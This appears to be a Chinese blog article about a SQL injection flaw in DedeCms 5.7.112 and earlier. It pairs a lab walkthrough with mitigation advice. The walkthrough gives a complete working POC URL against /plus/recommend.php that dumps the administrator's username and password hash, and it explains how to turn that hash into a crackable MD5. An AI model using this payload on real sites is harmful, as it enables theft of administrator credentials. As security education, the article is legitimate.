Dedecms漏洞注入,如何防范与应对?

漏洞描述

管理系统(DedeCms)存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息,此漏洞影响版本为DedeCms 5.7.112及以下。

Dedecms漏洞注入,如何防范与应对?插图1

影响版本

DedeCms <= 5.7.112

漏洞详情与实验步骤

实验环境

渗透主机:win2k8

目标靶机:cms-inject

用户名: college

密码: 360College

访问网站:http://IP:8081

Dedecms漏洞注入,如何防范与应对?插图3

实验步骤

1、启动目标靶机服务:找到phpstudy程序启动位置,启动服务。

2、访问目标网站:输入http://192.168.0.18:8081访问网站主页。

3、利用SQL注入漏洞:访问“/data/admin/ver.txt”页面获取系统最后升级时间,判断是否与漏洞相对应,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面进行SQL注入测试。

4、POC示例:使用特定的POC语句进行SQL注入,如http://IP:8081/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@%27%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin%20limit+0,1),5,6,7,8,9%23@%27+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294。

5、获取管理员信息:执行上述POC后,可以直接爆出用户名、密码等信息,需要注意的是,得到的是20位的散列值,去掉前三位和最后一位,得到管理员的16位MD5值,进而可以查询到原始密码。

防护建议

针对此漏洞的解决方案包括:

Dedecms漏洞注入,如何防范与应对?插图5

升级DedeCms至最新版:以修复已知的安全漏洞。

增加参数过滤:对可能引发SQL注入的参数进行严格的过滤和验证。

定期备份和监控:定期备份数据库,并监控网站的异常行为,及时发现并响应安全事件。

DedeCms作为国内知名的PHP开源网站管理系统,其安全性一直备受关注,此次发现的SQL注入漏洞再次提醒我们,即使是广泛使用的开源系统也需要持续关注其安全更新,并采取必要的防护措施来保障网站的安全。

以上就是关于“dedecms漏洞注入”的问题,朋友们可以点击主页了解更多内容,希望可以够帮助大家!

本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/90504.html

小末小末
上一篇 2024年11月5日 09:22
下一篇 2024年11月5日 09:43

相关推荐